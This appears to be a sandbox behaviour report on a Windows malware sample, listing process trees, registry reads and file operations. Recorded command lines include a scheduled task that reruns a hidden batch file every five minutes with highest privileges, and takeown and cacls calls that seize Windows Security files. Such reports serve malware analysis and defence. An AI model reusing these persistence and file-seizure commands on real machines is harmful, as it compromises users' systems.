| Command Line | "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\FD1HVy\AppData\Roaming\V1nQ8f0P.bat" /sc minute /mo 5 /RL HIGHEST /F |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:12, Reason: Child Process |
| Unmonitor | End Time: 00:03:54, Reason: Self Terminated |
| Monitor Duration | 00:00:41 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1390 |
| Parent PID | 0x11dc (c:\windows\syswow64\wscript.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1394
0x
F94
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00CD0000 | 0x00D28FFF | Process Termination | - | 32-bit | - |
|
|
|
Host Behavior
File (16)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
8 | |
| Open | STD_INPUT_HANDLE | - |
|
6 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 216, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\WINDOWS\system32\schtasks.exe | os_pid = 0x121c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #136: cmd.exe
300
0
| Information | Value |
|---|---|
| ID | #136 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\FD1HVy\Desktop\c7356Qly.bat" "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui"" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:13, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:12 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x138c |
| Parent PID | 0xfc8 (c:\users\fd1hvy\desktop\m.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
13A4
0x
468
|
Host Behavior
File (227)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\FD1HVy\Desktop\c7356Qly.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
32 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | - | type = file_type |
|
3 | |
| Open | STD_OUTPUT_HANDLE | - |
|
112 | |
| Open | STD_INPUT_HANDLE | - |
|
11 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
12 | |
| Write | STD_OUTPUT_HANDLE | size = 24 |
|
5 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 58 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 22 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 31 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 60 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 120, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (3)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\WINDOWS\system32\cacls.exe | os_pid = 0xedc, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\WINDOWS\system32\takeown.exe | os_pid = 0x13c0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (43)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
12 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
5 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
6 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = FD1HVy |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "msoeres.dll.mui" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
2 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
2 | |
| Set Environment String | name = FN, value = "msoeres.dll.mui" |
|
1 |
Process #139: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #139 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Security\vt mapping.exe" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:27, Reason: Self Terminated |
| Monitor Duration | 00:00:13 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xee8 |
| Parent PID | 0x1088 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
490
0x
126C
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00870000 | 0x00880FFF | Process Termination | - | 32-bit | - |
|
|
|
Process #140: cmd.exe
297
0
| Information | Value |
|---|---|
| ID | #140 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\FD1HVy\Desktop\c7356Qly.bat" "C:\Program Files\Windows Security\BrowserCore\manifest.json"" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:19, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:06 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xed0 |
| Parent PID | 0xfc8 (c:\users\fd1hvy\desktop\m.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F90
0x
BB4
|
Host Behavior
File (225)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\FD1HVy\Desktop\c7356Qly.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
32 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | - | type = file_type |
|
3 | |
| Open | STD_OUTPUT_HANDLE | - |
|
111 | |
| Open | STD_INPUT_HANDLE | - |
|
11 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
11 | |
| Write | STD_OUTPUT_HANDLE | size = 24 |
|
5 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 81 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 66 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 20 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 31 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 58 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 197, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\WINDOWS\system32\cacls.exe | os_pid = 0xe1c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\WINDOWS\system32\takeown.exe | os_pid = 0xaec, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (43)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
12 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
5 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
6 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = FD1HVy |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "manifest.json" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
2 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
2 | |
| Set Environment String | name = FN, value = "manifest.json" |
|
1 |
Process #142: cmd.exe
262
0
| Information | Value |
|---|---|
| ID | #142 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\FD1HVy\Desktop\c7356Qly.bat" "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui"" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:24, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x13fc |
| Parent PID | 0xfc8 (c:\users\fd1hvy\desktop\m.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
13F4
0x
CE0
|
Host Behavior
File (190)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\FD1HVy\Desktop\c7356Qly.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
25 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | - | type = file_type |
|
3 | |
| Open | STD_OUTPUT_HANDLE | - |
|
90 | |
| Open | STD_INPUT_HANDLE | - |
|
11 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
10 | |
| Write | STD_OUTPUT_HANDLE | size = 24 |
|
5 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 93 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 78 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 26 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 31 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 197, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
